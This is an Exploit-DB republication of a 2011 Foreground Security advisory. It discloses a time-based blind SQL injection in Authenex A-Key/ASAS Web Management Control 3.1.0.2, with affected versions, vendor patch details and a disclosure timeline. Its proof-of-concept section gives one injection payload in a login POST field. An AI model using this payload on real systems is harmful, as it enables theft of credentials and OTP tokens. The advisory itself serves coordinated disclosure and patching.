Authenex A-Key/ASAS Web Management Control 3.1.0.2 - Blind SQL Injection

EDB-ID:

18117




Platform:

Multiple

Date:

2011-11-15


============================================================
FOREGROUND SECURITY, SECURITY ADVISORY 2011-002
- Original release date: September 21, 2011
- Discovered by: Jose Carlos de Arriba - Senior Security Analyst at Foreground Security
- Contact: (jcarriba (at) foregroundsecurity (dot) com, dade (at) painsec (dot) com)
- Severity: 9.7/10 (Base CVSS Score)
============================================================

I. VULNERABILITY
-------------------------
Authenex A-Key/ASAS Web Management Control 3.1.0.2 (latest) - Time-based SQL Injection.

II. BACKGROUND
-------------------------
Authenex provides enterprises and enterprise IT managers and staff with a wide range of products that help keep both their networks and data secure. Authenex solutions enable users to securely and efficiently access network assets and personal, sensitive data anytime, anywhere. The Authenex suite of applications can be leveraged by a variety of USB and non-USB tokens.

III. DESCRIPTION
-------------------------
The Authenex Web Management Control allows users of Authenex A-Key (OTP Tokens for 2-factor authentication) and ASAS products to manage their OTP tokens and change user information (credentials, activate tokens, etc).

The Authenex Strong Authentication System (ASAS�) is a network security application that provides strong (two-factor) authentication for LAN, remote, VPN and web access. The ASASR System helps keep your networks secure by requiring your users to use their A-Key� tokens to authenticate via One-Time Password (OTP) whenever they want remote or LAN access to networks, web sites, portals, OWA servers, etc. The ASASR System utilizes an authentication server and database, as well as the A-Key� token as the basis for the most secure, easy to use, simple to administer and cost-effective two-factor authentication solution available today.

The A-Key� 4800 tokens are USB tokens that enable users to store data in encrypted memory (4 or 8 gigabytes) and safely take that data wherever they go. All data on an A-Key� token is safe from unauthorized use and from theft. The A-Key� token is password-protected and all data is encrypted. Also, the token has brute force penetration protection: if someone tries to log in to the token and fails a predefined number of times, the token will self-erase. This feature resides at the hardware level and cannot be altered.

IV. PROOF OF CONCEPT
-------------------------
http://authenexportal/akeyActivationLogin.do

POST DATA: rgstcode=1111111111111111&username=a'; WAITFOR DELAY '0:0:30'--

V. BUSINESS IMPACT
-------------------------
An attacker would be able access the Authenex database, dump all the OTP tokens, users information including credentials, etc.

Also, depending upon the database configuration the attacker would be able to access other databases or get a shell on the system.

VI. SYSTEMS AFFECTED
----------------------
Authenex Web Management Console 3.1.0.2, (latest version available according to the vendor).
Authenex ASAS 3.1.0.2
Authenex ASAS 3.1.0.3 (latest version available).

Prior versions and other products using the Web Management Console for A-key Tokens may be affected.

VII. SOLUTION
-------------------------
- Apply the security patches available at http://support.authenex.com/

VIII. REFERENCES
-------------------------
http://www.authenex.com/
http://www.foregroundsecurity.com/
http://www.painsec.com

Authenex customers can download the Security Bulletins and patches related to this vulnerabilty at http://support.authenex.com/

IX. CREDITS
-------------------------
This vulnerability has been discovered by Jose Carlos de Arriba (jcarriba (at) foregroundsecurity (dot) com, dade (at) painsec (dot) com).

X. REVISION HISTORY
-------------------------
- September 21, 2011: Initial release.

XI. DISCLOSURE TIMELINE
-------------------------
July 26, 2011: Vulnerability discovered by Jose Carlos de Arriba.
September 7, 2011: Vendor contacted by phone.
September 7, 2011: Security advisory sent to vendor providing the vulnerability details.
September  9, 2011: Vendor contacted us to notify the availability of a patch and to request as to check it.
September 9, 2011: Vulnerability fix checked and fixed.
September 16, 2011: Security Update released by vendor.
September 21, 2011: Security advisory released.

XII. LEGAL NOTICES
-------------------------
The information contained within this advisory is supplied "as-is" with no warranties or guarantees of fitness of use or otherwise.



Jose Carlos de Arriba, CISSP
Senior Security Analyst
Foreground Security
www.foregroundsecurity.com
jcarriba (at) foregroundsecurity (dot.) com